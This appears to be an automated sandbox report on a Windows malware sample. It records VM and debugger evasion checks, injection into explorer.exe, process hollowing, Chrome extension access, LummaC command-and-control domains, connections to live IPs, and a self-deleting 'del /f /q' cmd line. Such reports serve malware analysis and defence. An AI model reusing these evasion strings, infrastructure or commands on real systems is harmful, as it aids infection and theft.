                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: katB4C0.tmp PID: 4480, type: MEMORYSTR
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\jssrvvhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: jssrvvh, 00000010.00000002.3994920511.0000000003027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK0Q7G
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005E328F rdtsc 6_2_005E328F
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 469Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1349Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 750Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 379Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 362Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3499Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\ProgramData\FIEGCBKEGCFC\softokn3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\ProgramData\FIEGCBKEGCFC\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\ProgramData\FIEGCBKEGCFC\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                Source: C:\Windows\explorer.exe TID: 7544Thread sleep count: 469 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7552Thread sleep count: 1349 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7552Thread sleep time: -134900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 7548Thread sleep count: 750 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7548Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 7896Thread sleep count: 283 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7904Thread sleep count: 379 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7904Thread sleep time: -37900s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 7900Thread sleep count: 362 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7900Thread sleep time: -36200s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 7552Thread sleep count: 3499 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 7552Thread sleep time: -349900s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exe TID: 7968Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exe TID: 7964Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exe TID: 7816Thread sleep count: 71 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB0EBF0 PR_GetNumberOfProcessors,GetSystemInfo,11_2_6CB0EBF0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: explorer.exe, 00000001.00000000.1723893562.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000001.00000000.1723237920.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                Source: explorer.exe, 00000001.00000000.1721748248.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                Source: explorer.exe, 00000001.00000000.1723893562.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000001.00000000.1720143195.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                Source: explorer.exe, 00000001.00000000.1721748248.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.1723893562.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: explorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                Source: explorer.exe, 00000001.00000000.1723237920.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                Source: explorer.exe, 00000001.00000000.1723237920.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723237920.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2031885108.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000002.2346667476.0000000000609000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000975000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.0000000000969000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: katB4C0.tmp, 0000000B.00000003.2658098297.0000000000969000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
                Source: katB4C0.tmp, 0000000B.00000002.2791065578.00000000007D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: explorer.exe, 00000001.00000000.1723893562.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: 38F9.exe, 00000006.00000003.2031885108.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                Source: katB4C0.tmp, 0000000B.00000002.2791065578.00000000007D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarebli
                Source: explorer.exe, 00000001.00000000.1723237920.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                Source: explorer.exe, 00000001.00000000.1720143195.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000001.00000000.1720143195.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\2.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\2.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\2.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\Desktop\2.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005E328F rdtsc 6_2_005E328F
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00402A9F LdrLoadDll,0_2_00402A9F
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBDAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_6CBDAC62
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02DE0D90 mov eax, dword ptr fs:[00000030h]0_2_02DE0D90
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02DE092B mov eax, dword ptr fs:[00000030h]0_2_02DE092B
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02E3197D push dword ptr fs:[00000030h]0_2_02E3197D
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02D90D90 mov eax, dword ptr fs:[00000030h]5_2_02D90D90
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02D9092B mov eax, dword ptr fs:[00000030h]5_2_02D9092B
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02E51415 push dword ptr fs:[00000030h]5_2_02E51415
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0056092B mov eax, dword ptr fs:[00000030h]6_2_0056092B
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00560D90 mov eax, dword ptr fs:[00000030h]6_2_00560D90
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005DE013 push dword ptr fs:[00000030h]6_2_005DE013
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBDAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_6CBDAC62

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: D818.exe.1.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.18.245.58 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 31.176.197.47 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: D818.exe PID: 7224, type: MEMORYSTR
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\D818.exeMemory allocated: C:\Users\user\AppData\Local\Temp\katB4C0.tmp base: 400000 protect: page execute and read and writeJump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\AppData\Local\Temp\D818.exeCode function: 10_2_0437A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,10_2_0437A4F0
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\2.exeThread created: C:\Windows\explorer.exe EIP: 7DB19E0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhThread created: unknown EIP: 87F19E0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhThread created: unknown EIP: 30619E0
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\D818.exeMemory written: C:\Users\user\AppData\Local\Temp\katB4C0.tmp base: 400000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: 38F9.exeString found in binary or memory: zippyfinickysofwps.shop
                Source: 38F9.exeString found in binary or memory: obsceneclassyjuwks.shop
                Source: 38F9.exeString found in binary or memory: acceptabledcooeprs.shop
                Source: 38F9.exeString found in binary or memory: whispedwoodmoodsksl.shop
                Source: 38F9.exeString found in binary or memory: boredimperissvieos.shop
                Source: 38F9.exeString found in binary or memory: holicisticscrarws.shop
                Source: 38F9.exeString found in binary or memory: sweetsquarediaslw.shop
                Source: 38F9.exeString found in binary or memory: plaintediousidowsko.shop
                Source: 38F9.exeString found in binary or memory: miniaturefinerninewjs.shop
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\2.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\2.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Sample uses process hollowing technique
                Source: C:\Users\user\AppData\Local\Temp\D818.exeSection unmapped: C:\Users\user\AppData\Local\Temp\katB4C0.tmp base address: 400000Jump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\D818.exeMemory written: C:\Users\user\AppData\Local\Temp\katB4C0.tmp base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeMemory written: C:\Users\user\AppData\Local\Temp\katB4C0.tmp base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeMemory written: C:\Users\user\AppData\Local\Temp\katB4C0.tmp base: 422000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeMemory written: C:\Users\user\AppData\Local\Temp\katB4C0.tmp base: 42E000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeMemory written: C:\Users\user\AppData\Local\Temp\katB4C0.tmp base: 641000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeProcess created: C:\Users\user\AppData\Local\Temp\katB4C0.tmp C:\Users\user\AppData\Local\Temp\katB4C0.tmpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katB4C0.tmp" & rd /s /q "C:\ProgramData\FIEGCBKEGCFC" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC24760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,11_2_6CC24760
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB01C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,11_2_6CB01C30
                Source: explorer.exe, 00000001.00000000.1720375410.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1721600320.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723237920.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.1720375410.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.1720143195.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                Source: explorer.exe, 00000001.00000000.1720375410.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000001.00000000.1720375410.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBDAE71 cpuid 11_2_6CBDAE71
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
